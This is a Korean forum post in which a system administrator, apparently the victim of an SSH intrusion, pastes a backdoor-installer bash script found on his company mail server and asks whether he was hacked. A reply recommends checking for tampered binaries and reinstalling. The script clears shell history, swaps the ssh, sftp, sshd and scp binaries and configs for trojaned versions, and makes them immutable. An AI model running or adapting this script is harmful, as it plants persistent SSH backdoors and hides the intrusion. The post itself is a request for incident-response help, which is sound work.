해킹당한거같은데요..ㅜㅜ
작성자 정보
- 김도형 작성
- 작성일
컨텐츠 정보
- 3,229 조회
- 2 댓글
- 0 추천
- 목록
본문
ssh 공격이 들어온거같아서 백도어를 찾아볼려구하다가
#find / -type f -perm +6000 -ls 쳐보니 games란 파일있더군요.
처음보는거같애서 들어가보니 이런게 나오더군요...해킹당한건가용???
회사메일인데 다시 구축해야할까요? /tmp 에 ssh-Z??? 파일도 자꾸재생하구요.
#/usr/local/games/back
#!/bin/bash
unset HISTSAVE
unset HISTFILE
unset SAVEFILE
echo "++++ Starting.... ++++"
chattr -suia /usr/bin/ssh
chattr -suia /usr/bin/sftp
chattr -suia /usr/sbin/sshd
chattr -suia /usr/bin/scp
mkdir -p /etc/rpm
mv /usr/bin/ssh /etc/rpm
mv /usr/bin/sftp /etc/rpm
mv /usr/sbin/sshd /etc/rpm
mv /usr/bin/scp /etc/rpm
rm -rf /etc/ssh/sshd_config
rm -rf /etc/ssh/ssh_config
mv libcrypto.so.4 /lib/libcrypto.so.4
sleep 10
echo "[+] Installing SshD backdor..[+]"
mv ssh /usr/bin/ssh
mv sftp /usr/bin/sftp
mv sshd /usr/sbin/sshd
mv scp /usr/bin/scp
mv 1 /etc/ssh/sshd_config
mv 2 /etc/ssh/ssh_config
chattr +suia /usr/bin/ssh
chattr +suia /usr/bin/sftp
chattr +suia /usr/sbin/sshd
chattr +suia /usr/bin/scp
sleep 10
echo "Restart SshD deamon manualy "
관련자료
-
이전
-
다음
홍똘이님의 댓글
- 홍똘이
- 작성일
추가되었다고 생각하시면 일단 백도어 있는지 확인 그리고 기본적인 실행파일 변조되었는지 확인후 변조되었다면 재설치하시는게.. 제일 좋습니다.
김도형님의 댓글
- 김도형
- 작성일
내용해석좀 부탁드립니다.